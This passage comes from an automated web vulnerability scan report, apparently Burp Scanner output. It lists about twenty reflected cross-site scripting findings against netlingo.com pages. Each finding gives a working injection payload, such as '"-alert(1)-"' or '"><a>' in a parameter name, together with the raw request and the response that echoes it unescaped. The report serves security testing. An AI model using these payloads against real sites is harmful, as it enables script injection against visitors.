Date: Tue, 25 Jan 2011 04:51:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
etlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/pocket-dictionary.php?db5a1"-alert(1)-"ae07cad321d=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1305. http://www.netlingo.com/tools/search-browse-box.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/search-browse-box.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfb8"-alert(1)-"ec101ac6a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tools/search-browse-box.php?9dfb8"-alert(1)-"ec101ac6a81=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
etlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/search-browse-box.php?9dfb8"-alert(1)-"ec101ac6a81=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1306. http://www.netlingo.com/tools/toolbar.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/toolbar.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a8c"-alert(1)-"a5093f4aeaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tools/toolbar.php?f1a8c"-alert(1)-"a5093f4aeaf=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
tp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/toolbar.php?f1a8c"-alert(1)-"a5093f4aeaf=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1307. http://www.netlingo.com/tools/widget.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/widget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e65"-alert(1)-"26a6782f73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tools/widget.php?b8e65"-alert(1)-"26a6782f73=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ttp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/widget.php?b8e65"-alert(1)-"26a6782f73=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1308. http://www.netlingo.com/tools/wotd.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/tools/wotd.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 294d6"><a>ffde4f89edb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tools/wotd.php?294d6"><a>ffde4f89edb=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/wotd?294d6"><a>ffde4f89edb=1" />
...[SNIP]...

4.1309. http://www.netlingo.com/top50/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/top50/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e98e"-alert(1)-"4500bc2d8fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /top50/index.php?9e98e"-alert(1)-"4500bc2d8fd=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/top50/index.php?9e98e"-alert(1)-"4500bc2d8fd=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1310. http://www.netlingo.com/word-of-the-day/aotd.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word-of-the-day/aotd.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc897"><a>4481ee578ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/aotd.php?dc897"><a>4481ee578ce=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/aotd?dc897"><a>4481ee578ce=1" />
...[SNIP]...

4.1311. http://www.netlingo.com/word-of-the-day/business.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word-of-the-day/business.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da361"><a>4822f8fb4db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/business.php?da361"><a>4822f8fb4db=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/business?da361"><a>4822f8fb4db=1" />
...[SNIP]...

4.1312. http://www.netlingo.com/word-of-the-day/feeds.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/word-of-the-day/feeds.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84cb"-alert(1)-"1c9aec7a4f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /word-of-the-day/feeds.php?a84cb"-alert(1)-"1c9aec7a4f3=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/word-of-the-day/feeds.php?a84cb"-alert(1)-"1c9aec7a4f3=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1313. http://www.netlingo.com/word-of-the-day/jargon.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word-of-the-day/jargon.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5788f"><a>9028b8a2949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/jargon.php?5788f"><a>9028b8a2949=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/jargon?5788f"><a>9028b8a2949=1" />
...[SNIP]...

4.1314. http://www.netlingo.com/word-of-the-day/technical.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word-of-the-day/technical.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a02d3"><a>c8347305e25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/technical.php?a02d3"><a>c8347305e25=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/technical?a02d3"><a>c8347305e25=1" />
...[SNIP]...

4.1315. http://www.netlingo.com/word/53x.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/53x.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21222"><a>ee8a5baf684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/53x.php?21222"><a>ee8a5baf684=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/53x?21222"><a>ee8a5baf684=1" />
...[SNIP]...

4.1316. http://www.netlingo.com/word/aor.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/aor.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8757c"><a>7ac90e61106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/aor.php?8757c"><a>7ac90e61106=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/aor?8757c"><a>7ac90e61106=1" />
...[SNIP]...

4.1317. http://www.netlingo.com/word/buff.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/buff.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 118a7"><a>8fa8edf173 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/buff.php?118a7"><a>8fa8edf173=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/buff?118a7"><a>8fa8edf173=1" />
...[SNIP]...

4.1318. http://www.netlingo.com/word/cu46.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/cu46.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48a81"><a>07614ba167d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/cu46.php?48a81"><a>07614ba167d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/cu46?48a81"><a>07614ba167d=1" />
...[SNIP]...

4.1319. http://www.netlingo.com/word/dead-cell-phones.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/dead-cell-phones.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b65a"><a>f95e8cbe207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/dead-cell-phones.php?5b65a"><a>f95e8cbe207=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/dead-cell-phones?5b65a"><a>f95e8cbe207=1" />
...[SNIP]...

4.1320. http://www.netlingo.com/word/dead-computers.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/dead-computers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19a93"><a>65d9049a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/dead-computers.php?19a93"><a>65d9049a388=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/dead-computers?19a93"><a>65d9049a388=1" />
...[SNIP]...

4.1321. http://www.netlingo.com/word/digitally-grounded.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/digitally-grounded.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2eed"><a>df9967afe66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/digitally-grounded.php?c2eed"><a>df9967afe66=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/digitally-grounded?c2eed"><a>df9967afe66=1" />
...[SNIP]...

4.1322. http://www.netlingo.com/word/do-not-track.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/do-not-track.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37078"><a>2381b013eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/do-not-track.php?37078"><a>2381b013eb9=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/do-not-track?37078"><a>2381b013eb9=1" />
...[SNIP]...

4.1323. http://www.netlingo.com/word/elancers.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/elancers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb70"><a>b5d222c3b41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/elancers.php?7cb70"><a>b5d222c3b41=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/elancers?7cb70"><a>b5d222c3b41=1" />
...[SNIP]...

4.1324. http://www.netlingo.com/word/fingerprint.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/fingerprint.php

Issue detail

